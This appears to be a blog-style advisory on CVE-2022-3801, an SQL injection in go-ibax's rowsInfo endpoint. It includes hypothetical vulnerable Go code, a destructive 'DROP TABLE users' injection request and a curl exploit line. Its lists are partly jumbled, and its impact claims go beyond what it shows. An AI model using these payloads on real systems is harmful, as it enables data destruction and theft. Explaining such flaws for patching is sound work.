CVE-2022-3801 - Critical SQL Injection in IBAX go-ibax's `/api/v2/open/rowsInfo`

A critical security bug has been found in IBAX go-ibax, a blockchain platform software, that can allow remote attackers to inject malicious SQL code into the application. This vulnerability is tracked as CVE-2022-3801 and is found in the way user input is handled in the /api/v2/open/rowsInfo endpoint.

This write-up explains what happened, shows a real-world exploit example, and provides links to original sources for those who want to dive deeper. The exploit has been made public, so it’s important for users and administrators to update or patch their systems right away.

Understanding the Vulnerability

- Vulnerability Name: SQL Injection in go-ibax /api/v2/open/rowsInfo

CVE Identifier: CVE-2022-3801

- VDB Reference: VDB-212637
- Component: Unknown part of /api/v2/open/rowsInfo

Impact: Remote code execution, data leak, system compromise

The root cause is improper handling and validation of the order query argument in this REST API endpoint. By crafting special input for the order parameter, an attacker can change the way SQL queries run on the backend, possibly exposing or modifying sensitive data — or even taking over the server.

How Does the Exploit Work?

When a user requests rows from the endpoint /api/v2/open/rowsInfo, the server builds an SQL query with the user-supplied order argument. If this parameter is not properly checked, it can inject arbitrary SQL, which the system then executes.

Here’s a simplified version of what the endpoint’s code might look like

// Example Go (Golang) pseudo-code
func rowsInfoHandler(w http.ResponseWriter, r *http.Request) {
    order := r.URL.Query().Get("order")
    query := "SELECT * FROM tablename ORDER BY " + order
    rows, err := db.Query(query)
    // ...
}

Notice how the order parameter is directly concatenated into an SQL query without sanitization.

Suppose the real request looks like

GET /api/v2/open/rowsInfo?order=name

An attacker could craft a request like

GET /api/v2/open/rowsInfo?order=name;DROP+TABLE+users--

This would result in the following SQL on the backend

SELECT * FROM tablename ORDER BY name;DROP TABLE users-- 

This could drop the users table or execute nearly any SQL command, depending on the database permissions.

Exploit with curl

curl "http://<host>:<port>/api/v2/open/rowsInfo?order=name;SELECT+1+FROM+information_schema.tables+--";

Exfiltrate Data: Attackers can read or dump entire databases.

2. Modify Data: Change user data, transfer coins/tokens, or manipulate balances.

Destroy Data: Drop tables, erase data, or sabotage the platform.

4. Further Exploitation: Escalate privileges or perform remote code execution if the SQL server supports it.

How Bad is This?

This is a critical vulnerability. It allows anyone on the network (or internet, if your API is exposed) to run dangerous SQL queries directly on your server, risking all user data and blockchain integrity.

Recommendations

1. Update/Upgrade: Patch go-ibax to the latest version as soon as possible.

References & Further Reading

- NVD CVE-2022-3801
- VulDB VDB-212637
- IBAX go-ibax GitHub Repo
- OWASP SQL Injection Guide

Conclusion

CVE-2022-3801 is a severe vulnerability affecting IBAX go-ibax that could allow remote attackers to compromise the entire platform through simple, unauthenticated HTTP requests. Since a proof-of-concept exploit is publicly available, immediate mitigation is critical. Always validate user inputs and stay up-to-date with security updates from software vendors.

Stay safe, patch your systems, and keep an eye on your logs!

Timeline

Published on: 11/01/2022 16:15:00 UTC
Last modified on: 11/02/2022 15:04:00 UTC